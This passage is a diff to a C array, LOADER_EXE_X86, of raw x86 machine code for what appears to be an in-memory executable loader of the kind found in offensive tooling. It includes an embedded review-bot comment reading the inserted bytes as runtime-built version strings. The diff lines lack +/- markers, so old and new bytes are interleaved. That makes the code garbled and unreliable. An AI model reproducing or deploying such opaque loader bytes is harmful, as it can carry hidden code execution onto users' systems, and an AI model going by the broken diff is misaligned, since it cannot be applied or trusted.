0x4b, 0x19, 0x00, 0x00, 0xb9, 0x9f, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0x38, 0x19, 0x00, 0x00, 0xb9,
0x9f, 0x19, 0x00, 0x00, 0xb9, 0x9f, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0x8c, 0x19, 0x00, 0x00, 0xb9,
0x75, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x10, 0xe8, 0x25, 0x19, 0x00, 0x00, 0xb9, 0x51, 0x1c, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0x12, 0x19, 0x00,
0x10, 0xe8, 0x79, 0x19, 0x00, 0x00, 0xb9, 0x51, 0x1c, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0x66, 0x19, 0x00,
0x00, 0xb9, 0xb9, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e,
0x89, 0x41, 0x18, 0xe8, 0xff, 0x18, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0xec,
0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0xd9, 0x18, 0x00, 0x00, 0xb9, 0x2e,
0x89, 0x41, 0x18, 0xe8, 0x53, 0x19, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0x40,
0x19, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0x2d, 0x19, 0x00, 0x00, 0xb9, 0x2e,
0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x24,
0xe8, 0xc6, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x28, 0xe8, 0xb3, 0x18, 0x00, 0x00,
0xe8, 0x1a, 0x19, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x28, 0xe8, 0x07, 0x19, 0x00, 0x00,
0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89,
0x41, 0x2c, 0xe8, 0xa0, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x30, 0xe8, 0x8d, 0x18,
0x41, 0x2c, 0xe8, 0xf4, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x30, 0xe8, 0xe1, 0x18,
0x00, 0x00, 0xb9, 0xeb, 0x1f, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x34, 0xe8, 0x7a, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11,
0x0e, 0x89, 0x41, 0x34, 0xe8, 0xce, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x38, 0xe8,
0x67, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x3c, 0xe8, 0x54, 0x18, 0x00, 0x00, 0xb9,
0xbb, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x3c, 0xe8, 0xa8, 0x18, 0x00, 0x00, 0xb9,
0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x40, 0xe8, 0x41, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x44, 0xe8, 0x2e, 0x18, 0x00,
0x40, 0xe8, 0x95, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x44, 0xe8, 0x82, 0x18, 0x00,
0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e,
0x89, 0x41, 0x48, 0xe8, 0x1b, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x4c, 0xe8, 0x08,
0x89, 0x41, 0x48, 0xe8, 0x6f, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x4c, 0xe8, 0x5c,
0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x50, 0xe8, 0xf5, 0x17, 0x00, 0x00, 0xb9, 0x49,
0x8b, 0x0e, 0x89, 0x41, 0x50, 0xe8, 0x49, 0x18, 0x00, 0x00, 0xb9, 0x49,
0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x54,
0xe8, 0xe2, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x58, 0xe8, 0xcf, 0x17, 0x00, 0x00,
0xe8, 0x36, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x58, 0xe8, 0x23, 0x18, 0x00, 0x00,
0xb9, 0x6d, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89,
0x41, 0x5c, 0xe8, 0xbc, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x60, 0xe8, 0xa9, 0x17,
0x41, 0x5c, 0xe8, 0x10, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x60, 0xe8, 0xfd, 0x17,
0x00, 0x00, 0xb9, 0x13, 0x20, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x64, 0xe8, 0x96, 0x17, 0x00, 0x00, 0xb9, 0x41, 0x1c,
0x0e, 0x89, 0x41, 0x64, 0xe8, 0xea, 0x17, 0x00, 0x00, 0xb9, 0x41, 0x1c,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x68, 0xe8,
0x83, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x6c, 0xe8, 0x70, 0x17, 0x00, 0x00, 0xb9,
0xd7, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x6c, 0xe8, 0xc4, 0x17, 0x00, 0x00, 0xb9,
0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x70, 0xe8, 0x5d, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0x70, 0xe8, 0xb1, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0xcf, 0x8b, 0x7d, 0x08, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x74, 0x8d,
0x85, 0xfc, 0xfd, 0xff, 0xff, 0x83, 0x66, 0x10, 0x00, 0x50, 0x8d, 0x87,
0x19, 0x06, 0x00, 0x00, 0x89, 0x7e, 0x14, 0x50, 0x57, 0xe8, 0x16, 0x17,
0x19, 0x06, 0x00, 0x00, 0x89, 0x7e, 0x14, 0x50, 0x57, 0xe8, 0x6a, 0x17,
0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x5e, 0x04, 0x8d, 0x85, 0xfc, 0xfd,
0xff, 0xff, 0x53, 0x50, 0xff, 0x97, 0xb8, 0x00, 0x00, 0x00, 0x85, 0xc0,
0x75, 0x13, 0x8b, 0x0b, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87, 0xc0, 0x08,
@ -351,7 +351,7 @@ unsigned char LOADER_EXE_X86[] = {
0x00, 0x00, 0x00, 0x7d, 0x0b, 0x88, 0x0c, 0x17, 0x40, 0x42, 0x8a, 0x0a,
0x84, 0xc9, 0x75, 0xe9, 0x85, 0xc0, 0x74, 0x1d, 0xff, 0x75, 0x0c, 0x46,
0xc6, 0x44, 0x05, 0x80, 0x00, 0x03, 0xf0, 0x8d, 0x45, 0x80, 0x50, 0xe8,
0xb4, 0x1c, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x75, 0xbc, 0x40, 0xeb,
0x08, 0x1d, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x75, 0xbc, 0x40, 0xeb,
0x02, 0x33, 0xc0, 0x5f, 0x5e, 0xc9, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec,
0x1c, 0x83, 0x7d, 0x0c, 0x00, 0x74, 0x31, 0x6a, 0x1c, 0x8d, 0x45, 0xe4,
0x50, 0x8b, 0x45, 0x08, 0xff, 0x75, 0x0c, 0xff, 0x50, 0x44, 0x83, 0xf8,
@ -359,48 +359,55 @@ unsigned char LOADER_EXE_X86[] = {
0x81, 0x7d, 0xfc, 0x00, 0x00, 0x02, 0x00, 0x75, 0x0b, 0x83, 0x7d, 0xf8,
0x04, 0x75, 0x05, 0x33, 0xc0, 0x40, 0xc9, 0xc3, 0x33, 0xc0, 0xc9, 0xc3,
0x81, 0xec, 0x14, 0x02, 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0x24, 0x02,
0x00, 0x00, 0x33, 0xc0, 0x21, 0x44, 0x24, 0x04, 0x55, 0x8b, 0xac, 0x24,
0x24, 0x02, 0x00, 0x00, 0x56, 0x57, 0x8b, 0xbc, 0x24, 0x28, 0x02, 0x00,
0x00, 0x8b, 0x8f, 0xe8, 0x00, 0x00, 0x00, 0x85, 0xc9, 0x0f, 0x84, 0x82,
0x00, 0x00, 0x00, 0x53, 0x8d, 0x87, 0x60, 0x08, 0x00, 0x00, 0x50, 0x8d,
0x87, 0x50, 0x08, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88,
0x9d, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x8d, 0x45, 0x0c,
0x50, 0x57, 0xe8, 0x3d, 0x15, 0x00, 0x00, 0x8b, 0x13, 0x8d, 0x73, 0x04,
0x83, 0xc4, 0x0c, 0x8d, 0x87, 0x70, 0x08, 0x00, 0x00, 0x8b, 0x0a, 0x56,
0x50, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x52, 0xff, 0x51, 0x0c, 0x85, 0xc0,
0x78, 0x34, 0x8b, 0x06, 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b, 0x08,
0xff, 0x51, 0x28, 0x85, 0xc0, 0x78, 0x33, 0x83, 0x7c, 0x24, 0x14, 0x00,
0x74, 0x1f, 0x8b, 0x0e, 0x8d, 0x43, 0x08, 0x50, 0x8d, 0x87, 0x90, 0x08,
0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x87, 0x80, 0x08, 0x00, 0x00, 0x50,
0x51, 0xff, 0x52, 0x24, 0xeb, 0x03, 0x83, 0x26, 0x00, 0x85, 0xc0, 0x78,
0x09, 0x83, 0xbf, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x75, 0x1c, 0x8d, 0x43,
0x00, 0x00, 0x33, 0xc0, 0x55, 0x8b, 0xac, 0x24, 0x24, 0x02, 0x00, 0x00,
0x56, 0x57, 0x8b, 0xbc, 0x24, 0x28, 0x02, 0x00, 0x00, 0x33, 0xf6, 0x89,
0x74, 0x24, 0x18, 0x8b, 0x8f, 0xe8, 0x00, 0x00, 0x00, 0x85, 0xc9, 0x0f,
0x84, 0xd5, 0x00, 0x00, 0x00, 0x53, 0x8d, 0x87, 0x60, 0x08, 0x00, 0x00,
0x50, 0x8d, 0x87, 0x50, 0x08, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0,
0x0f, 0x88, 0xee, 0x00, 0x00, 0x00, 0x8d, 0x4c, 0x24, 0x24, 0xc6, 0x45,
0x0d, 0x34, 0x51, 0x8d, 0x45, 0x0c, 0xc6, 0x45, 0x11, 0x33, 0x50, 0x57,
0x66, 0xc7, 0x45, 0x13, 0x33, 0x31, 0xc6, 0x45, 0x15, 0x39, 0xe8, 0x7d,
0x15, 0x00, 0x00, 0x8b, 0x0b, 0x8d, 0x53, 0x04, 0x83, 0xc4, 0x0c, 0x8b,
0x01, 0x52, 0x8d, 0x97, 0x70, 0x08, 0x00, 0x00, 0x52, 0x8d, 0x54, 0x24,
0x2c, 0x52, 0x51, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x79, 0x40, 0x8d, 0x44,
0x24, 0x24, 0xc6, 0x45, 0x0d, 0x32, 0x50, 0x8d, 0x45, 0x0c, 0xc6, 0x45,
0x11, 0x35, 0x50, 0x57, 0x66, 0xc7, 0x45, 0x13, 0x37, 0x32, 0xc6, 0x45,
0x15, 0x37, 0xe8, 0x3d, 0x15, 0x00, 0x00, 0x8b, 0x03, 0x8d, 0x53, 0x04,
0x83, 0xc4, 0x0c, 0x8b, 0x08, 0x52, 0x8d, 0x97, 0x70, 0x08, 0x00, 0x00,
0x52, 0x8d, 0x54, 0x24, 0x2c, 0x52, 0x50, 0xff, 0x51, 0x0c, 0x85, 0xc0,
0x78, 0x35, 0x8b, 0x43, 0x04, 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b,
0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x78, 0x32, 0x39, 0x74, 0x24, 0x14,
0x74, 0x20, 0x8b, 0x4b, 0x04, 0x8d, 0x43, 0x08, 0x50, 0x8d, 0x87, 0x90,
0x08, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x87, 0x80, 0x08, 0x00, 0x00,
0x50, 0x51, 0xff, 0x52, 0x24, 0xeb, 0x03, 0x21, 0x73, 0x04, 0x85, 0xc0,
0x78, 0x08, 0x39, 0xb7, 0xe8, 0x00, 0x00, 0x00, 0x75, 0x1c, 0x8d, 0x43,
0x08, 0x50, 0x8d, 0x87, 0x90, 0x08, 0x00, 0x00, 0x50, 0x8d, 0x87, 0x80,
0x08, 0x00, 0x00, 0x50, 0x6a, 0x00, 0x6a, 0x00, 0xff, 0x97, 0xe4, 0x00,
0x00, 0x00, 0x85, 0xc0, 0x79, 0x10, 0x83, 0x63, 0x08, 0x00, 0x33, 0xc0,
0xe9, 0x1b, 0x01, 0x00, 0x00, 0x83, 0x23, 0x00, 0xeb, 0xd0, 0x8b, 0x43,
0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x0f, 0x88, 0x01,
0x01, 0x00, 0x00, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x80, 0x38, 0x00,
0x8d, 0x73, 0x0c, 0x75, 0x0c, 0x8b, 0x43, 0x08, 0x56, 0x50, 0x8b, 0x08,
0xff, 0x51, 0x34, 0xeb, 0x3e, 0x8d, 0x4c, 0x24, 0x24, 0x51, 0x50, 0x57,
0xe8, 0x73, 0x14, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24,
0x50, 0xff, 0x97, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x4b, 0x08, 0x8b, 0xf0,
0x8d, 0x43, 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x11, 0x56, 0x51, 0xff, 0x52,
0x30, 0x56, 0x89, 0x44, 0x24, 0x1c, 0xff, 0x97, 0xb4, 0x00, 0x00, 0x00,
0x8b, 0x44, 0x24, 0x18, 0x8d, 0x73, 0x0c, 0x85, 0xc0, 0x0f, 0x88, 0xa1,
0x00, 0x00, 0x00, 0x8b, 0x16, 0x8d, 0x43, 0x10, 0x50, 0x8d, 0x87, 0xa0,
0x00, 0x00, 0x85, 0xc0, 0x79, 0x0e, 0x21, 0x73, 0x08, 0x33, 0xc0, 0xe9,
0x1c, 0x01, 0x00, 0x00, 0x21, 0x33, 0xeb, 0xd2, 0x8b, 0x43, 0x08, 0x50,
0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x0f, 0x88, 0x05, 0x01, 0x00,
0x00, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x80, 0x38, 0x00, 0x8d, 0x53,
0x0c, 0x75, 0x0c, 0x8b, 0x43, 0x08, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51,
0x34, 0xeb, 0x3f, 0x8d, 0x4c, 0x24, 0x24, 0x51, 0x50, 0x57, 0xe8, 0x75,
0x14, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24, 0x50, 0xff,
0x97, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x4b, 0x08, 0x8b, 0xf0, 0x8d, 0x43,
0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x11, 0x56, 0x51, 0xff, 0x52, 0x30, 0x56,
0x89, 0x44, 0x24, 0x14, 0xff, 0x97, 0xb4, 0x00, 0x00, 0x00, 0x8b, 0x74,
0x24, 0x18, 0x8b, 0x44, 0x24, 0x10, 0x85, 0xc0, 0x0f, 0x88, 0xa4, 0x00,
0x00, 0x00, 0x8b, 0x53, 0x0c, 0x8d, 0x43, 0x10, 0x50, 0x8d, 0x87, 0xa0,
0x08, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x52, 0xff, 0x11, 0x85, 0xc0, 0x0f,
0x88, 0x87, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x24, 0x05, 0x00, 0x00, 0x83,
0x88, 0x89, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x24, 0x05, 0x00, 0x00, 0x83,
0x64, 0x24, 0x20, 0x00, 0x89, 0x44, 0x24, 0x1c, 0x8d, 0x44, 0x24, 0x1c,
0x50, 0x6a, 0x01, 0x6a, 0x11, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x8b,
0xf0, 0x85, 0xf6, 0x74, 0x63, 0x8b, 0x56, 0x0c, 0x33, 0xc9, 0x39, 0x8d,
0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x8a, 0x84, 0x29, 0x28, 0x05, 0x00,
0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00, 0x00, 0x72,
0xed, 0x8b, 0x4b, 0x10, 0x8d, 0x43, 0x14, 0x50, 0x56, 0x51, 0x8b, 0x11,
0xff, 0x92, 0xb4, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x1b, 0xc0, 0x33, 0xd2,
0x40, 0x8b, 0xca, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x46, 0x0c, 0x39, 0x95,
0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x88, 0x94, 0x29, 0x28, 0x05, 0x00,
0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00, 0x00, 0x72,
0xed, 0x56, 0xff, 0x97, 0xa4, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x10,
0x50, 0x6a, 0x01, 0x6a, 0x11, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x89,
0x44, 0x24, 0x10, 0x85, 0xc0, 0x74, 0x63, 0x8b, 0x50, 0x0c, 0x33, 0xc9,
0x39, 0x8d, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x8a, 0x84, 0x29, 0x28,
0x05, 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00,
0x00, 0x72, 0xed, 0x8b, 0x4b, 0x10, 0x8d, 0x43, 0x14, 0x8b, 0x5c, 0x24,
0x10, 0x50, 0x53, 0x8b, 0x11, 0x51, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00,
0xf7, 0xd8, 0x1b, 0xf6, 0x8b, 0x43, 0x0c, 0x33, 0xd2, 0x46, 0x8b, 0xca,
0x39, 0x95, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x88, 0x94, 0x29, 0x28,
0x05, 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00,
0x00, 0x72, 0xed, 0x53, 0xff, 0x97, 0xa4, 0x00, 0x00, 0x00, 0x8b, 0xc6,
0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x14, 0x02, 0x00, 0x00, 0xc3, 0x81,
0xec, 0x38, 0x01, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0x48,
0x01, 0x00, 0x00, 0x57, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0x76,
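Review bot: this hunk grows the embedded loader by 84 bytes (48 lines of 12 bytes become 55), and the inserted bytes decode to byte-wise stores of ASCII digits into a stack buffer: `0xc6, 0x45, 0x0d, 0x34` writes '4' to [ebp+0xd], `0x66, 0xc7, 0x45, 0x13, 0x33, 0x31` writes "31" to [ebp+0x13], `0xc6, 0x45, 0x15, 0x39` writes '9', and the second copy writes '2', '5', "72", '7' at the same offsets, i.e. version-string characters assembled at runtime rather than held as a constant. Only the compiled array is in the commit; the loader C source change behind it should be committed with it so the behaviour change can be reviewed and the array regenerated.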
@ -442,13 +449,13 @@ unsigned char LOADER_EXE_X86[] = {
0x00, 0x00, 0x45, 0x83, 0xc1, 0x04, 0x83, 0xc6, 0x08, 0x89, 0x4c, 0x24,
0x18, 0x3b, 0xaf, 0x3c, 0x02, 0x00, 0x00, 0x72, 0xb3, 0x8b, 0x87, 0x20,
0x09, 0x00, 0x00, 0x6a, 0x02, 0x5d, 0x3b, 0xc5, 0x75, 0x17, 0x57, 0xe8,
0x0f, 0xf1, 0xff, 0xff, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0x66, 0x01, 0x00,
0xbb, 0xf0, 0xff, 0xff, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0x66, 0x01, 0x00,
0x00, 0x8b, 0xb7, 0x60, 0x0d, 0x00, 0x00, 0xeb, 0x18, 0x83, 0xf8, 0x03,
0x0f, 0x84, 0x55, 0x01, 0x00, 0x00, 0x8d, 0xb7, 0x60, 0x0d, 0x00, 0x00,
0x83, 0xf8, 0x01, 0x74, 0x04, 0x8b, 0x74, 0x24, 0x1c, 0x83, 0xbf, 0x70,
0x05, 0x00, 0x00, 0x01, 0x74, 0x2e, 0x57, 0xe8, 0x73, 0xef, 0xff, 0xff,
0x05, 0x00, 0x00, 0x01, 0x74, 0x2e, 0x57, 0xe8, 0x1f, 0xef, 0xff, 0xff,
0x59, 0x85, 0xc0, 0x75, 0x0c, 0x39, 0xaf, 0x70, 0x05, 0x00, 0x00, 0x0f,
0x84, 0x26, 0x01, 0x00, 0x00, 0x57, 0xe8, 0x57, 0xf0, 0xff, 0xff, 0x59,
0x84, 0x26, 0x01, 0x00, 0x00, 0x57, 0xe8, 0x03, 0xf0, 0xff, 0xff, 0x59,
0x85, 0xc0, 0x75, 0x0c, 0x39, 0xaf, 0x70, 0x05, 0x00, 0x00, 0x0f, 0x84,
0x0f, 0x01, 0x00, 0x00, 0x83, 0x7e, 0x08, 0x01, 0x0f, 0x84, 0x9c, 0x00,
0x00, 0x00, 0x8b, 0x86, 0x24, 0x05, 0x00, 0x00, 0x6a, 0x04, 0x05, 0x2f,
@ -468,9 +475,9 @@ unsigned char LOADER_EXE_X86[] = {
0x83, 0x3e, 0x01, 0x74, 0x17, 0x39, 0x2e, 0x74, 0x13, 0x83, 0x3e, 0x05,
0x74, 0x05, 0x83, 0x3e, 0x06, 0x75, 0x41, 0x56, 0x57, 0xe8, 0x8f, 0x0c,
0x00, 0x00, 0xeb, 0x36, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x56, 0x57, 0xe8,
0xd4, 0xfa, 0xff, 0xff, 0x83, 0xc4, 0x0c, 0x85, 0xc0, 0x74, 0x0f, 0x8d,
0x80, 0xfa, 0xff, 0xff, 0x83, 0xc4, 0x0c, 0x85, 0xc0, 0x74, 0x0f, 0x8d,
0x44, 0x24, 0x24, 0x50, 0x56, 0x57, 0xe8, 0xa0, 0x00, 0x00, 0x00, 0x83,
0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x57, 0xe8, 0x7f, 0xf5, 0xff,
0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x57, 0xe8, 0x2b, 0xf5, 0xff,
0xff, 0xeb, 0x07, 0x56, 0x57, 0xe8, 0xe9, 0x03, 0x00, 0x00, 0x59, 0x59,
0x83, 0xbf, 0x30, 0x02, 0x00, 0x00, 0x03, 0x75, 0x02, 0xeb, 0xfe, 0x8b,
0x6c, 0x24, 0x10, 0x8b, 0x87, 0x20, 0x09, 0x00, 0x00, 0x83, 0xf8, 0x02,
@ -630,7 +637,7 @@ unsigned char LOADER_EXE_X86[] = {
0x85, 0xc9, 0x74, 0x71, 0x8b, 0x6c, 0x24, 0x38, 0x8b, 0xb4, 0x24, 0x58,
0x03, 0x00, 0x00, 0x79, 0x0c, 0x51, 0x6a, 0x00, 0x55, 0x53, 0xe8, 0xa4,
0x09, 0x00, 0x00, 0xeb, 0x32, 0x8d, 0x7a, 0x02, 0x03, 0xf9, 0x83, 0x7e,
0x04, 0x00, 0x74, 0x19, 0x57, 0x53, 0xe8, 0x93, 0xf2, 0xff, 0xff, 0x59,
0x04, 0x00, 0x74, 0x19, 0x57, 0x53, 0xe8, 0x3f, 0xf2, 0xff, 0xff, 0x59,
0x59, 0x85, 0xc0, 0x74, 0x0c, 0x8b, 0x83, 0x08, 0x01, 0x00, 0x00, 0x8b,
0x7c, 0x24, 0x20, 0xeb, 0x11, 0x6a, 0x00, 0x57, 0x55, 0x53, 0xe8, 0x74,
0x09, 0x00, 0x00, 0x8b, 0x7c, 0x24, 0x30, 0x83, 0xc4, 0x10, 0x89, 0x07,
@ -743,10 +750,10 @@ unsigned char LOADER_EXE_X86[] = {
0x00, 0x8b, 0x88, 0x24, 0x05, 0x00, 0x00, 0x05, 0x28, 0x05, 0x00, 0x00,
0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x50, 0x56, 0x56, 0xff, 0x53, 0x50,
0x8d, 0x44, 0x24, 0x58, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x44, 0x24, 0x14,
0x50, 0x53, 0xe8, 0xa5, 0xdf, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x4c, 0x89,
0x44, 0x24, 0x24, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x53, 0xe8, 0x48, 0xde,
0x50, 0x53, 0xe8, 0x51, 0xdf, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x4c, 0x89,
0x44, 0x24, 0x24, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x53, 0xe8, 0xf4, 0xdd,
0xff, 0xff, 0x8d, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
0x38, 0x8d, 0x44, 0x24, 0x38, 0x50, 0x53, 0xe8, 0xdb, 0xe9, 0xff, 0xff,
0x38, 0x8d, 0x44, 0x24, 0x38, 0x50, 0x53, 0xe8, 0x87, 0xe9, 0xff, 0xff,
0x83, 0xc4, 0x18, 0x56, 0x56, 0xff, 0x93, 0xec, 0x00, 0x00, 0x00, 0x85,
0xc0, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x0c, 0x50,
0x8d, 0x83, 0xd0, 0x08, 0x00, 0x00, 0x50, 0x6a, 0x03, 0x56, 0x8d, 0x83,
